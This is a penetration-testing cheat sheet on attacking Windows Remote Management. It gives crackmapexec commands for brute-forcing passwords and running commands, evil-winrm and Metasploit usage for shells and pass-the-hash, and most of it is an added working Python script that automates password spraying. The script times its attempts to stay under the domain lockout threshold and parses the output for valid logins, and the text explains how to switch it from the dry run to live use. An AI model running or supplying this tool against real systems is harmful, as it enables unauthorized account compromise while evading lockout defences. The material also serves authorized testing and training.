WinRM

  • Windows Remote Management: Microsoft's implementation of the WS-Management protocol (SOAP over HTTP), used for remote PowerShell

  • Runs over HTTP or HTTPS, not HTTPS only; with NTLM or Kerberos authentication the SOAP payload is encrypted at the message level even on the plain-HTTP port

  • PORT 5985 (HTTP) and 5986 (HTTPS)

  • A login only succeeds for members of the local Administrators or Remote Management Users groups, so valid domain credentials alone are not enough

Crackmapexec

crackmapexec <protocol> <ip>

  • Bruteforce WinRM passwords using a wordlist (-u and -p accept either a single value or a file with one entry per line)

    crackmapexec winrm <ip> -u <username> -p <wordlist>

    Caveat: hammering one account with a whole wordlist will hit the domain lockout threshold. Prefer spraying one password across many users per round and pausing for the observation window between rounds; --continue-on-success keeps going after the first valid login so every user is tested.

  • Command execution after bruteforce (WinRM login already implies code execution, which is why crackmapexec marks a valid WinRM login as Pwn3d!)

    crackmapexec winrm <ip> -u <username> -p <password> -x "command"
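
The spray-and-wait procedure above, as an added example that is not part of the original cheat sheet: a small Python wrapper that batches passwords so no user exceeds the lockout threshold per observation window, shells out to crackmapexec once per password, and parses the result lines for valid logins. It assumes crackmapexec is on PATH, that the lockout threshold and window are known from the domain policy, and that result lines follow the usual "WINRM ip port host [+] domain\user:pass (Pwn3d!)" layout; the sample output at the bottom is constructed for the dry run, not captured from a real host.

```python
#!/usr/bin/env python3
"""Lockout-aware WinRM password spray around crackmapexec (added example).

Assumptions (not facts from the page): crackmapexec is on PATH, the target's
lockout threshold/observation window are known, and its result lines look like
    WINRM   10.10.10.10   5985   DC01   [+] corp\\alice:Winter2024! (Pwn3d!)
    WINRM   10.10.10.10   5985   DC01   [-] corp\\bob:Winter2024!
"""
import re
import subprocess
import time

# One crackmapexec result line: protocol, ip, port, hostname, [+]/[-], cred,
# optional "(Pwn3d!)" marker.  Non-greedy cred so passwords may contain spaces.
RESULT_RE = re.compile(
    r"^WINRM\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+"
    r"\[(?P<status>[+-])\]\s+(?P<cred>.+?)(?:\s+\(Pwn3d!\))?\s*$"
)

# Constructed sample output used by the dry run below (not real tool output).
SAMPLE_OUTPUT = r"""
WINRM   10.10.10.10   5985   DC01   [+] corp\alice:Winter2024! (Pwn3d!)
WINRM   10.10.10.10   5985   DC01   [-] corp\bob:Winter2024!
"""


def parse_cme_output(text):
    """Map every 'domain\\user:password' seen to True (valid) or False (rejected)."""
    results = {}
    for line in text.splitlines():
        m = RESULT_RE.match(line.strip())
        if m:
            results[m.group("cred")] = m.group("status") == "+"
    return results


def build_command(ip, users, password, command=None):
    """argv for one password against a user (or a file of users).
    --continue-on-success: keep testing the remaining users after a hit."""
    argv = ["crackmapexec", "winrm", ip, "-u", users, "-p", password,
            "--continue-on-success"]
    if command:
        argv += ["-x", command]
    return argv


def plan_batches(passwords, lockout_threshold):
    """Split passwords into rounds of at most (threshold - 1) per user, so the
    bad-password counter never reaches the threshold inside one window.
    A threshold of 0 means no lockout policy: everything in one round."""
    if lockout_threshold <= 0:
        return [list(passwords)]
    per_round = max(1, lockout_threshold - 1)
    return [list(passwords[i:i + per_round])
            for i in range(0, len(passwords), per_round)]


def run_cme(argv):
    """Default runner: execute crackmapexec and hand back its stdout."""
    return subprocess.run(argv, capture_output=True, text=True, check=False).stdout


def spray(ip, users_file, passwords, lockout_threshold, window_seconds,
          runner=run_cme, sleeper=time.sleep):
    """Spray each password over the whole user list, sleeping for the
    observation window between rounds.  Returns {cred: True} for valid logins.
    runner/sleeper are injectable so the logic can be dry-run offline."""
    valid = {}
    rounds = plan_batches(passwords, lockout_threshold)
    for n, batch in enumerate(rounds):
        for password in batch:
            out = runner(build_command(ip, users_file, password))
            valid.update({c: ok for c, ok in parse_cme_output(out).items() if ok})
        if n < len(rounds) - 1:
            sleeper(window_seconds)  # let the bad-password counters reset
    return valid


if __name__ == "__main__":
    # Dry run against the constructed sample: no network, no sleeping.
    fake = lambda argv: SAMPLE_OUTPUT if argv[6] == "Winter2024!" else ""
    hits = spray("10.10.10.10", "users.txt",
                 ["Summer2023!", "Winter2024!", "Spring2024!"],
                 lockout_threshold=3, window_seconds=1800,
                 runner=fake, sleeper=lambda s: print(f"would sleep {s}s"))
    for cred in hits:
        user, password = cred.split(":", 1)
        print("valid:", cred, "->", " ".join(build_command("10.10.10.10", user, password, "whoami")))
```

Swap `runner=fake` for the default to run it for real; the threshold and window come from `net accounts /domain` on any domain-joined host, and with a threshold of 5 and a 30-minute window the script makes four attempts per user, then waits half an hour before the next four.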

Evil-winrm

  • Ruby gem that gives an interactive PowerShell prompt over WinRM (also supports pass-the-hash with -H and HTTPS on 5986 with -S).

evil-winrm -u <username> -p <password> -i <IP>

Metasploit

exploit/windows/winrm/winrm_script_exec (needs valid credentials; runs a PowerShell payload over WinRM)
